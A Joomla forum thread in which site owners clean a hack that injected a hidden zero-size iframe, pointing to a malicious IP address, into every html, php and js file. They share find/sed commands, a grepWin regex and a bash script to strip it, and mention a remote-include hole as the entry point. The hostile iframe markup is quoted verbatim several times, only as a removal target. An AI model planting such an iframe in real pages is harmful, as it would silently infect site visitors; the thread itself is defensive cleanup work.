How to remove iframes in all joomla files

[nutts4life]

Are these guys are so annoying.

So here's my site:
http://www.mymechani cs.co.uk/

Before you click on it! There is a worm embedded in an iframe on the site.

It occurs in two places, here:

Code: Select all

<body>
<div class="topbar">
<div id="navcontainer">
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><ul id="mainlevel-nav"><li><a href="http://www.mymechanics.co.uk/" class="mainlevel-nav" id="active_menu-nav">Home</a></li><li><a href="http://www.mymechanics.co.uk/Garages/" class="mainlevel-nav" >Browse Garages</a></li><li><a href="http://www.mymechanics.co.uk/Car-Advice/home" class="mainlevel-nav" >Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,14/" class="mainlevel-nav" >Add Garage</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,28/" class="mainlevel-nav" >Add Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/Forum/home" class="mainlevel-nav" >Forum</a></li></ul><div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>

Note that it occurs just before my first modules is loaded (which is mod_mainmenu). Here is the section in my template index.php:

Code: Select all

<body>
<div class="topbar">
<div id="navcontainer">
<?php mosLoadModules ( 'top',-1 ); ?>
<div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>

I have a couple of other modules loading.

Then it occurs immediately in my content pane:

Code: Select all

<div class="right_banner"></div>
	
		<table class="contentpaneopen">
				<tr>
			<td valign="top" colspan="2">
				<div align="left"><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>		<div class="moduletable-si">
				<table class="siteinfo">

The div -si is another module called mod_siteinfo. Here is it in my index.php:

Code: Select all

<div class="right_banner"><?php mosLoadModules('banner',-1);?></div>
<?php mosMainBody(); ?>
<?php if (mosCountModules('user1') || mosCountModules('user2')) { ?>

I've checked both the modules and there is no sign of it in here.

Where on earth is this code being put!? Could it be in the mosloadmodule call? where is that?

Sorry, any help would be great.

Thanks,

Olly

[nutts4life]

Ok,

I've found out what these monkeys have done.

Everysingle one of the index.html's have got this code in them.

As you all know there's about 100 - 150 of these.

And i have 5 sites, that all have the same problem.

I need some ideas on how i'm going to get rid of these iframes.

Any ideas?

Thanks,

Olly

[nutts4life]

OK, here's how i did it. I hope this is useful for someone one day.

The hacker had search and replaced ALL the php / html and htm files in my hosting area.

The had added the iframe html above.

So i logged into my hosting server using putty and ran the following commands from the root directory:

Code: Select all

find -name "*.htm*" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

AND

Code: Select all

find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

This got rid of them.

Good luck and let's beat these guys.

n4l

[Tonie]

Have you also found the way they came into your site? If not, it's going to be child's play to do it again.

[nutts4life]

Toni,

Thanks for the concern, I did find the way. I was using an include one of my other sites and reading the parameters of the include from the URL!

How dumb was that. Anyway, i fixed it all. If it happens again.

I will contact here.

Thanks,

n4l

[rajeshatbuzz]

I just modify above script and used following...
find -name "*.htm*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.php*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.js*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.html*" -exec sed -i 's/<iframe src=//' {} \;

but no output..
Is the command line is correct?

[mandville]

And change the chmod of the files that infected from 777 to 666.

no - delete the infected files and replace with poper clean files and then make sure your site is secure

[ifanatic]

Hi guys,

I am in the same situation as above.

I don't have putty access to my host.
So now I have to restore files from recent backups.

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.


Regards,

[mandville]

Hi guys

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.
Regards,

http://docs.joomla.org/Security_Checklist_7

[WeWatch]

If you have your entire website downloaded on your PC (backup) you could use grepWin.

If you find the string that needs to be removed you can create a regex string to find and remove all of them.

Place a \ in front of all special characters: ( ) { } / as this uses grep's regex which is different from others.

So the line found in the first website:

Code: Select all

<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Would be found with:

Code: Select all

<iframe src\s*=\s*['|"]http:\/\/.*width\s*=\s*0 height\s*=\s*0 style\s*=\s*['|"]hidden['|"] frameborder\s*=\s*0 marginheight\s*=\s*0 marginwidth\s*=\s*0 scrolling\s*=\s*no><\/iframe>

The "\s*" before and after each "=" means that there might be a space or tab before and after the "=". You need to account for that. the ['|"] is a character class that will match either a single quote or double quote - you need to account for that as well.

The regex I show above will catch any iframe with those parameters regardless of whether or not the iframe uses an IP address or any domain - so be carefule with it. The section: http:\/\/.* means: http:// all characters up to width. The dot is all characters and the * is zero or many times.

When using grepWin, I usually tell it to search first, then I'll go ahead and let it do a search and replace. Replace with a blank will remove it all.

If you have problems using grepWin let me know and I'll help you create a string.

[rajeshatbuzz]

Dream weaver this tool which is best for this. You can remove IFRAME code from all the files in click using dreamweaver.

[mandville]

dreamweaver may be the tool for you, but how did the code get there in the first place?

[vjorchid]

Dream weaver this tool which is best for this. You can remove IFRAME code from all the files in click using dreamweaver.

Please can you explain a little more how i could delete my iframe from dreamweaver?

any script or tool to clen those fu... iframes?

i can belive in this day and i cant find an antivirus to clean my site from my ftp?
can your suggest any tool to clean my site online?

repeat i cant download all the file again..and upload..all soo many files...

[WeWatch]

You'll have to download all the files to your local PC. Otherwise, you won't have the tools to do what you want to do.

Then I'd suggest using grepWin.

[vjorchid]

i cant download all the files in my pc...

any chance to delete iframes using php my admin? how?

thanks
please i need a solution online

[jaspujari]

You can modify and run the following script in the root dir of your Joomla site.
It will clean all the files with the iframe infection, typically with one line appended to all .js files.
Feel free to replace the search string with a different regexp that handles your infection.
This will cycle thryu every file and replace the searched string with a space.
=================
#!/bin/bash
for fl in $(grep -rl 'document.write..<iframe src="http://.*<.iframe>..' .); do
sed -i 's/document.write(.<iframe src="http:\/\/.*<\/iframe>.)/ /g' $fl
echo "Fixed " $fl
done
=================
take care of permissions after the cleanup to stop future infections.

cheers
J

[trichnosis]

checking your database records may help too. a part of the iframes may come from your db records